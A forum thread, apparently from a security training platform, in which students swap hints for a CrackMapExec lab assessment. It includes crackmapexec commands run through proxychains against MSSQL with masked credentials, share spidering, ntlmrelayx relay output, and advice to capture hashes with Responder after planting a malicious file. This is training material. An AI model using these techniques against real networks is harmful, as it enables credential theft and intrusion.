Using CrackMapExec - Skills Assessment

Module completed, if you need help message me, or simpley ask in a forum.

I found the users je and al, with their passwords. Both are DC users but not local. I have read this post several times and I don’t know how to get j*s’s password. I used ldap and smb enumeration for kerberos and asrepoast.

Any hint to continue with the module?

I found the users Jue and Atl, with their passwords. Both are DC users but not local. I have read this post several times and I don’t know how to get j*s’s password. I used ldap and smb enumeration for kerberos and asrepoast.

Any hint to continue with the module?

Did you got the flag from SQL01 ?
After that you get usernames with their passwords from the databases

j *s’s password comes after…

You have to enumerate the database in order to proceed.

Thanks for your help, check each of the databases and i got the following information:

database enumerates: master / tempdb / model / msdb / interns

just show tables for databases: msdb / master , when i checked one by one tables i did’nt found a tables with usernames.

the usesr J----e and At–l not were local user on 172.15.15.15.

You are getting hot…

Try this SELECT * FROM [interns].[dbo].details

I can´t see the tables of interns databases…

sudo proxychains4 -q crackmapexec mssql 172.16.15.15 -u J****** -p ****** -q “SELECT table_name from interns.INFORMATION_SCHEMA.TABLES”
MSSQL 172.16.15.15 1433 SQL01 Windows 10 / Server 2019 Build 17763 (name:SQL01) (domain:INLANEFREIGHT.LOCAL)
MSSQL 172.16.15.15 1433 SQL01 [+] INLANEFREIGHT.LOCAL\J******:P********

your command
sudo proxychains4 -q crackmapexec mssql 172.16.15.15 -u J****** -p ******** -q “SELECT * FROM [interns].[dbo].details”
MSSQL 172.16.15.15 1433 SQL01 [] Windows 10 / Server 2019 Build 17763 (name:SQL01) (domain:INLANEFREIGHT.LOCAL)
MSSQL 172.16.15.15 1433 SQL01 [+] INLANEFREIGHT.LOCAL\J
*****:********

you need mysql creds to enumerate the sql database

Delete the post, dont show passwords like that.

try 172.16.15.3 a**** --spider DEV -pattern txt

than use get-file to get whatever you found in the dev share.

This will get you to the SQL01

Than try SELECT * FROM [interns].[dbo].details

But also there is the flag on that machine, you will have to priv than impersonate and more c:\Users\Public\flag.txt

So 2 things you will get so you can continue.

thank your support. excellent explanation. it was funny when i got creds files, but the username has 2 symbols. i said ■■■.

But i can continue with your support. thank my friend

Those 2 symbols are encoding errors, they mean nosthing just ignore them.
Now you are on a right track.

Hello friend.
This weekend I was trying to answer question 3 (DEV01), the server only responds to me with the smb protocol (domain users). I checked the shared folders as you indicated in question 2 and there is no interesting information.

What should I do? I have checked all the sections several times.

hi, friend.

i have a question. i executed ntlmrelay attack and i got an an attempt of connection from user james SUCCEED.

results

[] SMBD-Thread-4 (process_request_thread): Connection from INLANEFREIGHT/JAMES@10.129.204.182 controlled, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[
] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED

what should i do to get the hash?

hi, Halfluke.
I’m stuck at question 3, I was checked all the sections for this module.

i have a question about question 3. i executed ntlmrelay attack and i got an an attempt of connection from user james SUCCEED.

results

[] SMBD-Thread-4 (process_request_thread): Connection from INLANEFREIGHT/JAMES@10.129.204.182 controlled, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[
] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED

what should i do to get the hash? any suggestions?

Sorry, i am currently on vacation with no access to my notes. Sorry about that

Hi reyjem,

I have completed this module, and I did not use ntlmrelayx for that. I recommend you use Responder instead. You should receive ***** hash within a minute or so. Obviously, this approach will only work if you have dropped a malicious file somewhere…

hi, @emer1ca . yesterday I checked all and i found the hash.
I got the answer for the question 3.

this morning i got the answer for the question 4

Any Hint for the question 5?
[/quote]

hi, @anichols9 .

I’m in the last question. but i checked your post and i saw you got password for user svc_inlaneadm. I dont have it.

should I have it to solve the last question?

I’m stuck at question 5

Any hint ?